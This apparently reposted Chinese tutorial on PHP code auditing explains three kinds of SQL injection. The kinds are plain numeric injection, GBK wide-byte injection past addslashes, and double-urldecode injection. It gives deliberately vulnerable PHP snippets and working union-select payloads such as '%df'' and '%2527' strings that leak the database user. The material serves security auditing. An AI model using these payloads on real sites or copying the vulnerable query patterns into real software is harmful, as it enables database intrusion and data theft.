2. 程式人生 > >PHP程式碼審計-SQL注入漏洞挖掘

PHP程式碼審計-SQL注入漏洞挖掘

阿新 發佈:2018-11-23

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。

普通注入

$uid = $_GET[‘id’];

$sql = “select * from user where id=$uid”;

$conn = mysql_connect(“localhost”,”root”,””);

$sel = mysql_select_db(“test123”,$conn);

$result = mysql_query($sql,$conn);

普通注入有int型和string型,在string型中需要用到單引號或雙引號閉合

在這裡變數並沒有被單引號所保護,我們可以直接構造一條sql語句來進行列猜解

  1. 1 union select 1,2,3  
    後半部分使用union select查詢的列數與資料庫中列數不匹配的話(表結構不同)會導致報錯(The used SELECT statements have a different number of columns
  2. 1 union select 1,user(),3,4
    這個時候查詢的列數與資料庫中使用表的列數相同,則會返回所查詢的值,這樣就完成了列猜解。

結果:Array ( [0] => 1 [1] => [email protected]

[2] => 2 [3] => 3 )

編碼注入

通過輸入轉碼函式不相容的特殊字元,可以導致輸出的字元變成有害資料(在SQL注入裡,最常見的編碼注入是Mysql寬位元組以及urldecode/rawurldecode)

$conn = mysql_connect(“localhost”,”root”,””);

mysql_select_db(“test123”,$conn);

mysql_query(“SET NAMES ‘gbk'”,$conn);

$uid = addslashes($_GET[‘id’]);

$sql = “select * from userinfo where id=’$uid'”;

$result = mysql_query($sql,$conn);

print_r(‘當前查詢語句:’.$sql.'<br />結果:’);

print_r(mysql_fetch_row($result));

在這裡我們可以看到使用了mysql_query設定了資料庫的編碼為gbk,並且使用了addslashes針對變數id進行保護

  1. %df’ union select 1,2,3,4 –+
    使用%df將addslashes的\合併成字元,這時後面的單引號就會將前面的單引號合併,–+將最後面的引號註釋掉,中間的union select得以執行。

當前查詢語句:

select * from userinfo where id=’�\\\’ union select 1,2,3,4#’


結果:Array ( [0] => 1 [1] => 2 [2] => 3 [3] => 4 )

二次urldecode注入

現在的web程式大多會進行引數過濾,大多通常使用addslashes(),mysql_real_escape_string(),mysql_escape_string()函式或者開啟GPC的方式來防止注入,也就是給* ‘ ” \和NULL加上反斜槓進行轉義,如果某處使用了urldecode或者rawurldecode函式,將會導致二次解碼生成單引號而引發注入。

原理:

假設目標開啟了GPC的情況下,提交引數為1%2527的payload,因為第一次解碼沒有單引號,addslashes不會進行轉義,導致%25生成字元%,第二次進行解析的時候將會把%27解析成單引號造成閉合。

$conn = mysql_connect(“localhost”,”root”,””);

mysql_select_db(“test123”,$conn);

$b = addslashes($_GET[‘id’]);

$uid = urldecode($b);

$sql = “select * from userinfo where id=’$uid'”;

$result = mysql_query($sql,$conn);

print_r(‘當前查詢語句:’.$sql.'<br />結果:’);

print_r(mysql_fetch_row($result));
  1. 此處可以構造語句 
    %2527%20union%20select%201,user(),3,4%2523
    針對單引號進行閉合

當前查詢語句:

select * from userinfo where id=” union select 1,user(),3,4#’


結果:Array ( [0] => 1 [1] => [email protected] [2] => 3 [3] => 4 )

如此就可以通過搜尋urldecode和rawurldecode函式來挖掘二次urldecode注入漏洞。

相關推薦

PHP程式碼審計-SQL注入漏洞挖掘

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$

程式碼審計】五指CMS_v4.1.0 copyfrom.php 頁面存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

程式碼審計】XIAOCMS_後臺database.php頁面存在SQL注入漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網

php程式碼審計命令執行漏洞

命令執行漏洞,使用者通過瀏覽器在遠端伺服器上執行任意系統命令,嚴格意義上,與程式碼執行漏洞還是有一定的區別。  常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

ecshop 全系列版本網站漏洞 遠端程式碼執行sql注入漏洞

ecshop漏洞於2018年9月12日被某安全組織披露爆出,該漏洞受影響範圍較廣,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影響,主要漏洞是利用遠端程式碼執行sql注入語句漏洞,導致可以插入sql查詢程式碼以及寫入程式碼到網站伺

程式碼審計】五指CMS_v4.1.0 後臺存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

程式碼審計】大米CMS_V5.5.3 SQL注入漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

PHP程式碼審計 16 漏洞挖掘的思路

本文記錄 PHP 程式碼審計的學習過程,教程為暗月 2015 版的 PHP 程式碼審計課程 1. 簡介 漏洞形成的條件 可以控制的變數(一切輸入都是有害的) 變數到達有利

PHP SQL注入漏洞防範

在PHP中採用魔術引號進行過濾,但是PHP5.4之後被取消了,同時在遇到int型注入也不會那麼有效,所以用的最多的還是過濾函式和類(例如discuz,dedecms,phpcms),如果單純的過濾函式寫的不嚴謹,就會出現繞過的情況,最好的解決方法還是預編譯的方式。 GPC/runtime魔術

asp.net 360通用防護程式碼,防止sql注入與xss跨站漏洞攻擊

這是360提供的一個aspx公用程式碼,可以防止sql注入漏洞,xss跨站攻擊漏洞,如果您的網站被360掃描,出現sql注入或跨站攻擊等相關漏洞,沒有較好的解決方案,倒是可以採用該方法進下防範。 -----------------使用方法------------

ecshop SQL注入漏洞導致程式碼執行

139c139,140 + $arr['num'] = intval($arr['num']); + $arr['id'] = intval($arr['id']); 267c268 --- 270c271,272 + $arr['id'] = intval($arr['

php用於防SQL注入的幾個函式

用於防SQL注入的幾個函式 不要相信使用者的在登陸中輸入的內容,需要對使用者的輸入進行處理 SQL注入: ' or 1=1 #   防止SQL注入的幾個函式:   addslashes($string):用反斜線引用字串中的特殊字元' " \ $u

PHP程式碼審計入門

部落格轉載 --程式碼審計入門   程式碼審計--準備 1,先放一張大圖,php程式碼審計的幾個方向,也是容易出問題的地方,沒事的時候可以多看看。   2,程式碼審計也就是拿到某網站的原始碼,進行審計,從而發現漏洞,但是我們審計的時候並不一定要一行一行的去看吧,這樣未免也太浪費時

程式碼審計--變數覆蓋漏洞

可能會導致變數覆蓋漏洞的函式有parse_str(),extract(),import_request_variables()以及$$。 1.parse_str()導致的漏洞 <!-- parse_str($a = $_GET['flag']); if ($bdctf == "BCD

ThinkPHP 5.1.x SQL注入漏洞分析

一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無

如何在PHP中防止SQL注入

  1: 使用PDO物件(對於任何資料庫驅動都好用)2: addslashes用於單位元組字串的處理,3: 多位元組字元用mysql_real_escape_string吧。 另外對於php手冊中get_magic_quotes_gpc的舉例: if (!get_magic_quote

SQL注入漏洞筆記

一:注入原理 SQL注入是一種常見的Web安全漏洞,攻擊者利用這個問題,可以訪問或修改資料,或者利用潛在的資料庫漏洞進行攻擊 SQL注入是一種將SQL語句插入或天機到應用(使用者)的輸入引數中的攻擊,之後再將這些引數傳遞給後臺的SQL伺服器加以解析並執行 常見的web架構 表示層 :訪問網址

怎麼修復網站漏洞之metinfo遠端SQL注入漏洞修補

2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是MetInfo的上傳程式碼裡的引數值沒有進行安全過濾,導致上傳路徑這裡進行偽造路徑,並可以插入惡意的程式碼

CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞

0x00漏洞簡介 metinfo是一個cms 6.1.2版本中存在一個sql盲注漏洞 0x01漏洞細節與漏洞利用 在\app\system\message\web\message.class.php的add函式。 get_one這裡有個columnid 這個地方是傳入int型別

PHP程式碼審計Day5-8練習題

文章目錄 前言 Day5 – escapeshellarg與escapeshellcmd使用不當 解題 第一部分 payload: 第二部分 payload